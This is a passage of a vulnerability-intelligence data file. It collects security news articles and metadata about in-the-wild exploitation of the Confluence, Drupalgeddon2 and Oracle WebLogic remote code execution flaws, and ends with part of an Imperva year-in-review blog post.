Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:30", "description": "[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was published online, which was followed by large-scale Internet scanning and exploitation attempts. \n \nShortly after that, we saw attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon 2 vulnerability to inject [cryptocurrency miner](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>)s, backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nMursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service\u2014have already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed. \n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-5T7PpU6AWTk/WtG6Fi7QwCI/AAAAAAAAwOw/y5fEvJ9j7kM_-JbVZmCYg_FMATnvpYzmACLcBGAs/s728-e100/hacking-drupal-remote-code-execution-exploit-code.png>)\n\nHackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code. \n \nTwo weeks ago, Drupal security team [discovered](<https://www.drupal.org/sa-core-2018-002>) a highly critical remote code execution vulnerability, dubbed **Drupalgeddon2**, in its content management system software that could allow attackers to completely take over vulnerable websites. \n \nTo address this vulnerability the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue. \n \nTwo days ago, security researchers at Check Point and Dofinity [published](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) complete technical details about this vulnerability (CVE-2018-7600), using which, a Russian security researcher published a proof-of-concept (PoC) [exploit code](<https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py>) for Drupalgeddon2 on GitHub. \n \nThe Drupalgeddon2 vulnerability that affects all versions of Drupal from 6 to 8 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations. \n\n\n[](<https://thehackernews.com/images/-qsxcL4GQ5_Y/WtG9rLLIcyI/AAAAAAAAwO8/acsBgkJ4gYYe5c5Vnk2t2l3f-S95bTrBgCLcBGAs/s728-e100/drupal-exploit.png>)\n\n \nAccording to checkpoint's disclosure, the vulnerability exists due to the insufficient sanitation of inputs passed via Form API (FAPI) AJAX requests. \n \n\n\n> \"As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,\" Check Point researchers said. \n\n> \"By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.\"\n\n \nHowever, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at [Sucuri](<https://twitter.com/danielcid/status/984555586644688898>), [Imperva](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>), and the [SANS](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none have yet to see any reports of websites being hacked. \n \nSites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploits. \n \nThe vulnerability also affects Drupal 6, which is no longer supported by the company since February 2016, but a patch for the version has still been created.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-14T08:29:00", "type": "thn", "title": "Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-14T08:37:13", "id": "THN:B0F0C0035DAAFA1EC62F15464A80677E", "href": "https://thehackernews.com/2018/04/drupal-rce-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:39", "description": "[](<https://thehackernews.com/images/-rIYNaeU1bb8/XMlFNdFL9_I/AAAAAAAAz4g/ioP3l5goEXYV6kwJvqgQXuChrtVFbUYJwCLcBGAs/s728-e100/ransomware-oracle-weblogic.jpg>)\n\nTaking advantage of newly disclosed and even patched vulnerabilities has become common among cybercriminals, which makes it one of the primary attack vectors for everyday-threats, like crypto-mining, phishing, and ransomware. \n \nAs suspected, a recently-disclosed critical vulnerability in the widely used Oracle WebLogic Server has now been spotted actively being exploited to distribute a never-before-seen ransomware variant, which researchers dubbed \"**Sodinokibi**.\" \n \nLast weekend, The Hacker News learned about a critical deserialization remote code execution [vulnerability in Oracle WebLogic Server](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>) that could allow attackers to remotely run arbitrary commands on the affected servers just by sending a specially crafted HTTP request\u2014without requiring any authorization. \n \nTo address this vulnerability (CVE-2019-2725), which affected all versions of the Oracle WebLogic software and was given a severity score of 9.8 out of 10, Oracle rolled out an out-of-band [security update](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) on April 26, just a day after the vulnerability was made public and several in-the-wild attacks were observed. \n \nAccording to cybersecurity researchers from Cisco Talos' threat research team, an unknown group of hackers has been exploiting this vulnerability since at least April 25 to infect vulnerable servers with a new piece of ransomware malware. \n\n\n[](<https://thehackernews.com/images/-NyvdVA6dbaE/XMlHegXqUiI/AAAAAAAAz40/554Hulf2uwgF6Dk-2-fXKebGk63SdLVIgCLcBGAs/s728-e100/ransomware-oracle-weblogic.png>)\n\nSodinokibi is a dangerous ransomware variant which has been designed to encrypt files in a user's directory and then delete shadow copy backups from the system in an effort to prevent victims from recovering their data without paying a ransom. \n \n\n\n## No Interaction Required to Deploy Ransomware\n\n \nSince attackers are leveraging a remote code execution vulnerability in the WebLogic Server, unlike typical ransomware attacks, deploying the Sodinokibi ransomware requires no user interaction. \n \n\n\n> \"Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,\" researchers explain in a [blog post](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>). \n \n\"In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses.\"\n\n \n \nOnce downloaded, the Sodinokibi ransomware encrypts the victim's systems and displays a ransom note demanding up to $2,500 in Bitcoin. The amount doubles to $5,000 if the ransom is not paid within a specified number of days\u2014which may vary from two days to six days. \n \n\n\n## Hackers Are Also Installing GandCrab Ransomware\n\n \nResearchers also noted that roughly eight hours after deploying Sodinokibi on an infected system, the attackers exploited the same WebLogic Server vulnerability to install another piece of ransomware known as [GandCrab](<https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html>) (v5.2). \n\n\n[](<https://thehackernews.com/images/-MvaUSRB1IIk/XMlHYDSzrgI/AAAAAAAAz4o/bc94128mSTQz0yu0p92EhQ_ei9eWEiJkQCLcBGAs/s728-e100/ransomware-attack.png>)\n\n> \"We find it strange the attackers would choose to distribute additional, different ransomware on the same target,\" the researchers say. \"Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\"\n\n \nAttackers have been exploiting the Oracle WebLogic Server vulnerability in the wild since at least April 17 to distribute [cryptocurrency miners](<https://isc.sans.edu/diary/Update+about+Weblogic+CVE-2019-2725+%28Exploits+Used+in+the+Wild%2C+Patch+Status%29/24890>) and other [types of malware](<https://devcentral.f5.com/articles/oracle-weblogic-deserialization-remote-code-execution-34185>). \n \nWebLogic Server is a popular Java-based multi-tier enterprise application server typically used by businesses to support enterprise apps, which makes it an often target of attackers trying to carry out malicious operations, like running cryptocurrency miners and infecting with ransomware. \n \nOrganizations that use Oracle WebLogic Server should make sure to update their installations to the latest version of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-01T07:23:00", "type": "thn", "title": "Hackers Found Exploiting Oracle WebLogic RCE Flaw to Spread Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T07:31:20", "id": "THN:C3BFE86E2BE38F28D9CEB17AD2C50EBD", "href": "https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVEs activity in Imperva Attack Analytics. Also, Given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. Today, you shouldn\u2019t depend on your developers to build water-tight 